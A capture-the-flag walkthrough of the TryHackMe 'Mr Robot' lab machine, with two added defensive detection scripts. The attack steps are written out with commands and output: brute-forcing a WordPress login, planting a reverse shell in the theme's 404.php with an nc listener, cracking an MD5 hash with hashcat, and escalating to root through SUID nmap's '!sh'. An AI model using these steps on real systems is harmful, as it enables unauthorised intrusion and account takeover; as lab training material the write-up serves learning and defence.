Mr Robot
Overview
Mr. Robot is an amazing show, and Rami Malek played the central role of an elite hacker named Elliot. This machine is based on the show, which demonstrated very realistic hacking techniques throughout. If you haven't watched it, I highly recommend it.
So, as THM describes it, the machine is based on the show, and having that background gives you a slight advantage while enumerating.
Recon
Let's move on with a simple nmap scan and see what we can come up with.
root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/mrRobot/data# nmap -sS -sV -O -Pn -A -T4 -oN mrrobot.nmap.txt 10.10.167.217
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 10:36 EST
Nmap scan report for 10.10.167.217
Host is up (0.077s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
Device type: general purpose|specialized|storage-misc|broadband router|printer|WAP
Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Linux 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   5.08 ms  10.6.0.1
2   ... 3
4   74.42 ms 10.10.167.217

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.14 seconds
Summary:
- It's a Linux machine.
- Ports 80 and 443 are open, so enumerating the web service is the next step.
- There is an SSH port (22), but it is closed.
Enumeration
When you visit the server's web service in your browser you will notice that it is running a WordPress blog, but there is not much on it. Fire up DirBuster to do directory scanning, and also run wpscan to learn more about the WordPress installation.
In the meantime, visit wp-admin, try some default username/password combinations, and enumerate. You can also use the “forgot password” form with admin and elliot as usernames and see what comes back.

The website confirms that “admin” is not a user on the system, but elliot is!
wpscan should also reveal that robots.txt is accessible. Go to http://10.10.102.138/robots.txt and you will notice that it lists two files (one is the first key). Download both files!
Let's use ZAP to brute-force elliot's login with the wordlist fsocity.dic that you downloaded before. Note that the file has a bunch of duplicates; you can eliminate those with -
sort fsocity.dic | uniq > fsoc.txt
We will use fsoc.txt as our wordlist. Fire up the ZAP fuzzer and crack the password -

This took me about 5-10 minutes, and finally it got me through with Elliot's creds.

You should now have cracked Elliot’s password!
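Brute-forcing a WordPress login this way leaves a distinctive trace in the web server's access log. As an added example (not from the original write-up), this POSIX shell snippet runs a simple detection over a constructed Apache log excerpt: it counts POSTs to wp-login.php per client and reports clients over a threshold, along with how many of their attempts received the 302 redirect WordPress sends on a successful login.

```shell
#!/bin/sh
# Constructed Apache combined-log excerpt (not captured from the machine): one client
# hammering wp-login.php the way a fuzzer does, ending in a 302 (WordPress redirects to
# wp-admin on a successful login), plus unrelated traffic from a second client.
SAMPLE_LOG='10.6.19.215 - - [03/Dec/2020:20:55:01 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
10.6.19.215 - - [03/Dec/2020:20:55:01 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
10.6.19.215 - - [03/Dec/2020:20:55:02 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
10.6.19.215 - - [03/Dec/2020:20:55:02 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
10.6.19.215 - - [03/Dec/2020:20:55:03 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [03/Dec/2020:20:55:04 -0500] "GET /robots.txt HTTP/1.1" 200 41
203.0.113.7 - - [03/Dec/2020:20:55:05 -0500] "POST /wp-login.php HTTP/1.1" 200 3421
10.6.19.215 - - [03/Dec/2020:20:55:09 -0500] "POST /wp-login.php HTTP/1.1" 302 0'

# flag_wp_login_bruteforce THRESHOLD < access.log
# Prints "ip posts successes" for every client with at least THRESHOLD POSTs to
# wp-login.php. A 200 on such a POST is a failed login (WordPress re-renders the
# form with an error); a 302 is a successful one.
flag_wp_login_bruteforce() {
    awk -v thr="$1" '
        $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ {
            posts[$1]++
            if ($9 == "302") ok[$1]++
        }
        END {
            for (ip in posts)
                if (posts[ip] >= thr) printf "%s %d %d\n", ip, posts[ip], ok[ip] + 0
        }' | sort
}

# Run the detection over the constructed sample with a threshold of 5 attempts.
printf '%s\n' "$SAMPLE_LOG" | flag_wp_login_bruteforce 5
```

On a real server, feed it the live log instead: `flag_wp_login_bruteforce 50 < /var/log/apache2/access.log`. A client that shows up with many POSTs and exactly one 302 at the end is the pattern to alert on.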
Exploit
Let's go to the theme editor view in the admin screen and edit 404.php. Why 404.php? Because editing it will not break the theme or the website, and we can easily trigger it by visiting a nonexistent page.
Since our payload lives in 404.php, we browse to a nonexistent page on the website so that the 404 handler fires and the server runs 404.php, which executes our reverse shell; we catch it with a listener as below -

In the browser - https://10.10.102.138/wp-admin2222
While you start a listener on your attack machine -
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.102.138] 50256
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 02:13:17 up 1:35, 0 users, load average: 0.00, 0.28, 1.51
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
You should now catch the reverse shell -
$ whoami
daemon
$ ls -l
total 76
drwxr-xr-x   2 root root  4096 Sep 16  2015 bin
drwxr-xr-x   3 root root  4096 Oct  3  2018 boot
drwxr-xr-x  13 root root  3820 Dec  4 00:38 dev
drwxr-xr-x  77 root root  4096 Dec  4 00:38 etc
drwxr-xr-x   3 root root  4096 Nov 13  2015 home
lrwxrwxrwx   1 root root    33 Jun 24  2015 initrd.img -> boot/initrd.img-3.13.0-55-generic
drwxr-xr-x  16 root root  4096 Jun 24  2015 lib
drwxr-xr-x   2 root root  4096 Jun 24  2015 lib64
drwx------   2 root root 16384 Jun 24  2015 lost+found
drwxr-xr-x   2 root root  4096 Jun 24  2015 media
drwxr-xr-x   4 root root  4096 Nov 13  2015 mnt
drwxr-xr-x   3 root root  4096 Sep 16  2015 opt
dr-xr-xr-x 116 root root     0 Dec  4 00:38 proc
drwx------   3 root root  4096 Nov 13  2015 root
drwxr-xr-x  14 root root   480 Dec  4 00:38 run
drwxr-xr-x   2 root root  4096 Nov 13  2015 sbin
drwxr-xr-x   3 root root  4096 Jun 24  2015 srv
dr-xr-xr-x  13 root root     0 Dec  4 00:38 sys
drwxrwxrwt   4 root root  4096 Dec  4 00:38 tmp
drwxr-xr-x  10 root root  4096 Jun 24  2015 usr
drwxr-xr-x  11 root root  4096 Jun 24  2015 var
lrwxrwxrwx   1 root root    30 Jun 24  2015 vmlinuz -> boot/vmlinuz-3.13.0-55-generic
Spawn a TTY shell with the python command below and enumerate further. You will notice that there is a robot user on the machine. In that user's home directory you will find another key along with a hashed password.
$ cd /home
$ python -c 'import pty; pty.spawn("/bin/bash");'
daemon@linux:/home$ ls -l
ls -l
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$

daemon@linux:/home/robot$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4XXXXXXXXXX
daemon@linux:/home/robot$
You can either look the hash up on CrackStation or use hashcat as below -
$ hashcat -a 0 -m 0 ./hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 2891/2955 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

c3fcd3d76192eXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXX

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: c3fcd3d76192eXXXXXXXXXX
Time.Started.....: Thu Dec  3 21:22:23 2020 (0 secs)
Time.Estimated...: Thu Dec  3 21:22:23 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 606.3 kH/s (0.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: treetree -> loserface1

Started: Thu Dec  3 21:22:01 2020
Stopped: Thu Dec  3 21:22:23 2020
Now that you know the password of the user “robot” on the machine, you can switch to that user using -
daemon@linux:/home/robot$ su - robot
su - robot
Password: abcdefgXXXXXXXXXX

$ whoami
whoami
robot
$
Post-Exploit/PrivEsc
Now, download linPEAS from your attack machine onto the robot machine and run it.
Attack machine (serving linpeas.sh over HTTP) -
eneloop@kinetic:/oscp/tools/PEAS$ cd linPEAS/
eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ ls
images  linpeas.sh  README.md
eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ python3 -m http-server
/usr/bin/python3: No module named http-server
eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.102.138 - - [03/Dec/2020 21:27:19] "GET /linpeas.sh HTTP/1.1" 200 -
On the robot machine -
robot@linux:/tmp$ chmod 755 linpeas.sh
chmod 755 linpeas.sh
robot@linux:/tmp$ ./linpeas.sh
./linpeas.sh
 Starting linpeas. Caching Writable Folders...
linPEAS will surface some interesting observations and a possible path to privilege escalation.
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root  46K Feb 17  2014 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root  67K Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root  41K Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root  46K Feb 17  2014 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root  32K Feb 17  2014 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root  37K Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root  10K Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root  44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root  44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 431K May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root  68K Feb 12  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root  93K Feb 12  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root  11K Feb 25  2015 /usr/lib/pt_chown  --->  GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 152K Mar 12  2015 /usr/bin/sudo  --->  /sudo$
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap
-r-sr-xr-x 1 root root 9.4K Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root  14K Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
Right there, nmap looks like the juicy target, as its SUID bit is set. A quick visit to GTFOBins will show you multiple ways to exploit nmap to escalate your privileges.
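Before jumping to the exploit, this is what the same finding looks like from the defender's side. As an added example (not from the original write-up), this POSIX shell snippet diffs the SUID list linPEAS printed above against an assumed baseline of the SUID binaries a stock Ubuntu 14.04 image is expected to carry, so that locally installed extras such as /usr/local/bin/nmap stand out; the baseline is constructed here from the standard paths in that listing.

```shell
#!/bin/sh
# Constructed input: the SUID paths linPEAS reported on this machine (taken from the
# listing above, permissions and sizes stripped). On a live host this list comes from:
#   find / -xdev -perm -4000 -type f 2>/dev/null
CURRENT_SUID='/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/bin/su
/usr/lib/eject/dmcrypt-get-device
/bin/ping6
/bin/ping
/usr/lib/openssh/ssh-keysign
/bin/umount
/bin/mount
/usr/lib/pt_chown
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper'

# Assumed baseline: the package-managed SUID set of a stock Ubuntu 14.04 install.
# In practice this is recorded from a freshly built, known-good image of the same release.
BASELINE_SUID='/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown'

# audit_suid BASELINE < current-list
# Prints, sorted, every SUID path on stdin that the baseline does not account for.
audit_suid() {
    awk -v base="$1" '
        BEGIN { n = split(base, b, "\n"); for (i = 1; i <= n; i++) known[b[i]] = 1 }
        NF && !($0 in known)' | sort
}

printf '%s\n' "$CURRENT_SUID" | audit_suid "$BASELINE_SUID"
```

Every path the audit prints needs a justification or its SUID bit removed; a copy of nmap under /usr/local with SUID set has no legitimate reason to exist on a web server.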
Exploit nmap
robot@linux:/tmp$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
#
You should now have root on this machine; go and get your key from /root.
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
XXXXXXXXXXXXXXXXXXXXXXXX
#
I am sure there are more ways to hack into this machine but I will leave it for another day.